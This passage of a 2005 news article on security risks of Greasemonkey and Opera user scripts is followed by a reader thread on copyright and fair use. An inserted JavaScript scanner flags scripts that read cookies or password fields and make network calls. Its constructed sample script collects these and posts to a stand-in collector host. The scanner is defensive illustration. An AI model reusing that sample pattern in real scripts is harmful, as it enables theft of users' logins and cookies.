(continued from previous page)
through lists of enticing scripts might fail to distinguish between malicious and benign code.
"A user JavaScript file can in no way harm your computer or stored data, but badly written files can slow down Opera, and malicious files can spy on your browsing," browser maker Opera warns in a Web posting about the new feature in its latest beta. "Never install and use a script library from someone you don't know and trust--if in doubt, post in the Opera forums, newsgroups or mailing lists and ask if the script you would like to use is well written and exploit-free."
User scripts also could facilitate password-stealing schemes, said security consultant Richard Smith, who runs the ComputerBytesMan Web site.
"The bad guys could likely create a script for stealing usernames and passwords in login forms using this tool," Smith said. "They would still need to break into someone's computer to install the script, but the tool would make the theft process much easier."
Aaron Boodman, the 26-year-old programmer in Seattle who wrote Greasemonkey, declined to comment on the extension or on its security implications.
But in a recent posting to his Web site, he acknowledged its security liabilities, and worried that Greasemonkey would become vulnerable as a result of its increasing notoriety.
"A hacker could create a script that does something users want, but also makes a call to the hacker's server, sending your cookies to that machine," Boodman wrote. "He could even scan for password fields and upload those...At this point, I'm only comfortable because the (Greasemonkey) community is relatively small and techie. It would be difficult for a hacker to distribute a malicious script in this environment."
In his posting, Boodman said he was open to ideas on improving Greasemonkey's security.
For now, he urged caution along the same lines that Opera did.
"All I can say is that just like any other software, you should think a tiny bit before installing a user script," Boodman wrote. "Make sure the author is someone you trust, or at least in a social network you trust."
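The caution that Opera and Boodman urge before installing a user script can be partly mechanized. The following is an added example, not code from Greasemonkey, Opera or the article: it scans a user script's source for the behaviours Boodman describes (reading cookies, locating password fields, making network calls) and checks how widely its @include patterns apply. The rule set, the verdict names and both sample scripts are constructed for illustration.

```javascript
// Added example: static pre-install review of a user script's source.
// RULES, the verdict names and the sample scripts are constructed here.
const RULES = [
  { id: 'password-fields', re: /type\s*=\s*["']?password/i },
  { id: 'reads-cookies', re: /\bdocument\s*\.\s*cookie\b/ },
  { id: 'network-call', re: /\b(?:GM_xmlhttpRequest|XMLHttpRequest|fetch)\b/ },
];

// Extract @include patterns from the ==UserScript== metadata block.
function includePatterns(source) {
  const block = source.match(/\/\/\s*==UserScript==([\s\S]*?)\/\/\s*==\/UserScript==/);
  if (!block) return [];
  return [...block[1].matchAll(/^\s*\/\/\s*@include\s+(\S+)/gm)].map((m) => m[1]);
}

// A pattern is broad when its host part is a bare wildcard.
function isBroad(pattern) {
  if (pattern === '*') return true;
  return pattern.replace(/^[a-z*]+:\/\//i, '').split('/')[0] === '*';
}

function reviewUserScript(source) {
  const findings = [];
  source.split(/\r?\n/).forEach((text, i) => {
    for (const rule of RULES) {
      if (rule.re.test(text)) findings.push({ rule: rule.id, line: i + 1, text: text.trim() });
    }
  });
  const includes = includePatterns(source);
  // Greasemonkey runs a script with no @include on every page.
  const broadScope = includes.length === 0 || includes.some(isBroad);
  const seen = new Set(findings.map((f) => f.rule));
  const readsSecrets = seen.has('reads-cookies') || seen.has('password-fields');
  let verdict = 'low';
  if (findings.length > 0 || broadScope) verdict = 'review';
  // Reading credentials AND talking to the network is the pattern to stop on.
  if (readsSecrets && seen.has('network-call')) verdict = 'high';
  return { verdict, broadScope, includes, findings };
}

// Constructed input: touches cookies and password fields, has a network call.
const SAMPLE = [
  '// ==UserScript==',
  '// @name     Constructed sample',
  '// @include  *',
  '// ==/UserScript==',
  'var fields = document.querySelectorAll("input[type=password]");',
  'var jar = document.cookie;',
  'GM_xmlhttpRequest({ method: "POST", url: "https://collector.example/" });',
].join('\n');

// Constructed input: a cosmetic script scoped to a single site.
const BENIGN = [
  '// ==UserScript==',
  '// @name     Constructed font fix',
  '// @include  http://news.example.com/*',
  '// ==/UserScript==',
  'document.body.style.fontSize = "16px";',
].join('\n');

for (const [name, src] of [['sample', SAMPLE], ['benign', BENIGN]]) {
  const result = reviewUserScript(src);
  console.log(name, result.verdict, 'broadScope=' + result.broadScope);
  result.findings.forEach((f) => console.log(`  line ${f.line}: ${f.rule}: ${f.text}`));
}
```

String matching of this kind only narrows down where to read; obfuscated or dynamically built code will not match, so a clean result is not a substitute for reading the source or trusting its author.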






http://dunck.us/anabasis/archives/2005/03/19/user-scripts-spreading-to-opera/
However, Greasemonkey was developed in a vacuum. I guess the conditions were right for this to be developed, and the two projects happened to overlap. IE implementation any day now...?
It sure is the most annoying!
It's whose, not who's!
More comments at mozillazine.org: http://www.mozillazine.org/talkback.html?article=6274
It is an important difference over bookmarklets; it's quite possible for someone to install a user script and not think about it as they browse.
Also, I tend to think of user scripts as extensions with a stricter security model (same as regular in-page JS security model).
I see a time coming very soon when things like this will result in lawsuits. It happened to Google for changing sites and I suspect that large sites with the money for the lawyers will be going after people that change their web sites. After all, most of these sites rely on advertising and anything that messes with that is going to get slammed with lawsuits.
The 26-year-old that made Greasemonkey as well as Opera for adding such feature to their browser directly needs to be gone after. I hope it happens and I hope they both lose greatly.
People and companies need to respect everyone's copyrighted material.
Robert
And those people who use babelfish translation tools to view my pages in French? Well, we already know how innately evil those Frenchies are. Sue 'em all, the bastards!
I heard there are even people using Microsoft's XP offline feature to MAKE COPIES OF MY WEB PAGES ON THEIR LAPTOPS for offline reading. How dare they! *I* own the copyright to my pages, and *I* dictate who can see them, how they can see them, and what they can do with them. No more adjusting fonts, no more Flash-removal bookmarklets, it's all evil evil evil.
Why? Because, as a Webmaster, I control the horizontal, I control the vertical! You... you are nothing but a peon visitor to my fine pages, and you do not have rights.
Got a problem with that? How 'bout I send the RIAA lawyers after you? Hrumph. Because I bet you're the same sort of scoundrel that makes MIX tapes for friends (those songs were NOT meant to be heard out of order... apart from their albums). You probably bastardize the sound of songs with an EQUALIZER, too. That's *NOT* how the artists intended their music to be listened to! It's not!!!
In fact, I'm talking with stereomakers right now to get those equalizer thingamabobs taken off.
MY CONTENT! It's MY CONTENT. Did you hear me?!?!?!?!!!!!!!11111
I dog-ear pages; I rip pages out of magazines; I cut articles from newspapers. Why shouldn't I be able to do similar things with web sites (change font size, pass it through a text-to-speech program, highlight sections, translate it to my native language)?
DRM is not to protect copyright; don't let anyone tell you different. DRM removed fair use rights from the consumer.
So, if you're running the user script only for personal use, you're pretty legally secure. Yes, as someone pointed out, this is part of fair use doctrine.
The only legal exception I am aware of to fair use is the DMCA's prohibition against circumventing a copy-protection mechanism--but, then, that section of that law is flawed anyway.
Yes, the content may be your property, but if you want to dictate what others do with it for personal use, you have to wrap it in copy-protection that prevents them from using it in any way you don't like. If I'm remembering the DMCA's terminology correctly, this copy-protection must be technological in nature. Sorry, a legal notice won't work; you actually have to give them something to break through first.
By the way, I'm not a lawyer--I just read the text of these laws and agreements affecting copyright for my own research.
Did you know that satire is protected fair use? If I wanted, I could copy parts of your posts just to make fun of them in a satirical way . . . Fortunately, I'm not interested in doing that. I just thought I would point that out to explain your "ownership" only entitles you, and Hollywood and the RIAA, to so much. It's the major loophole they slipped past Congress in the DMCA that gives them so much control, but as I said, you need to use copy-protection to use that loophole.
P.S. Technically, circumventing copy protection for fair use purposes is legal--Congress invalidated this, though, by making it illegal to create any tool that circumvents copy-protection. It provides no exceptions for this part of the law, assuming I'm remembering correctly. Thus, effectively, since you generally need a tool to circumvent copy-protection, even fair use becomes illegal for copy-protected works. Boy, did Hollywood and the RIAA pull the wool over Congress's eyes on that one.
. . . and copyright holders need to return that respect by respecting the fair use rights of those people and companies. Both sides need to learn respect. Hollywood and the RIAA clearly have no respect for fair use, except when it benefits them. It's obvious you don't either, and you don't deserve any copyright you own until you learn that respect.
What is up with the state of investigation on this site lately? Many basic errors that would take a few minutes of research to prevent!
Anything the user uses to intentionally change the content for their own personal use should be fine. Like I said, you can do it yourself as long as you don't spread it around or show it to someone else, but I could see a judge say that helping someone do it by providing a tool is a violation. Hopefully, it would fail on appeal.
I have to say I really don't think there is much that companies can do via litigation to stop or kill this kind of thing. Instead capitalists will do what they always have done and adapt.
http://russ.johnsonville.net/default.aspx?Page=Blog
Just wow. Where do you come from dude?
If you don't like the terms of use, then leave. People don't have a right to free information.
I mean, it also says you can't "participate in the transfer or sale of . . . any of the materials or content or our sites in whole or in part." I understand sale of, but by receiving the content by viewing the sale, aren't you participating in the transfer of the content of the site in part?
Just because something is stated in the terms of use doesn't mean it is valid or legal. Clearly, viewing the web site is legal, and I doubt C-Net Networks would counter that position. I would even say you are legally secure saving one of these documents on your hard drive for later viewing, and even changing the content, as long as you're the only one who ever sees it.
Writing a user script and using it client side thus seems to be pretty hard to attack legally to me. Spreading a user script around, however, could be problematic, depending on what it does. That would have to be tested in court.
Riiiight, because that's not inane at all, is it?
Greasemonkey allows the end user to modify a web page on the client side only, as does Google. But Google wants to throw in ads and whatnot that might damage the website. Like putting Amazon ads on a small online bookstore's page. With Greasemonkey the user can alter the way he views it, and I doubt a user is going to add ads to a page through Greasemonkey.
And no, this is not a copyright violation. If I used it to alter websites in some way, your web site has not been touched, nor does it affect your next visitor.
No I do not want your cookies, (one site I've visited had eight)
NO I DO NOT WANT TO STRAIN MY EYES to read your supersmall obscure typeface
No I do not want your ads. I know how to use Google and I can spell Wandangle Widget just fine so the next time I need one I can get it myself
......
Oh, and by the way, and if I do use Google I don't want your search engine hijacking my request
(I had a non search item pop-up generate because the site I went to had an ad for a similar unwanted item)
If I want a right-handed widget pole the last thing I need is an ad for left handed goose oil, let alone TWO ADS
SO
until you tell me truthfully what ALL is on your site I WILL USE WHATEVER MEANS to remove unwanted material
you sound like the spammers that intentionally misspell words so the spam filters will allow it to pass, anything so your content will be viewed
WELL there is an uprising and you WILL fall along with your intrusive ads and unwanted pop-ups and impossible to read type
SURFERS OF THE WEB UNITE!!!
Robert
The article seems to be focusing on the relatively mild security risk that someone might install a malicious user script onto their own computers. This, however, is a security risk that can be controlled really well just through a little bit of common sense. I don't believe that your data could be altered in any way, since a site such as yours would, I believe, make a custom HTML page on each request to return to the browser. I think this is all Greasemonkey could affect, and thus, you are safe on your end.
- What about database-based web site? Are they vulnerable too?
- by March 28, 2005 6:39 AM PST
- What about dynamic database-based websites, rather than static HTML websites? Can the Firefox extension alter those websites as well? Are dynamic websites also vulnerable to the security issues raised by this browser extension?
- I would doubt it . . .
- by March 28, 2005 4:10 PM PST
- Greasemonkey, as I understand it, and others have confirmed to me, only operates on the client side. The security risk seems pretty mild, thus, as it can only affect what the client sees. It can't alter anything on your server side, so it's safe.
Showing 1 of 2 pages (98 Comments)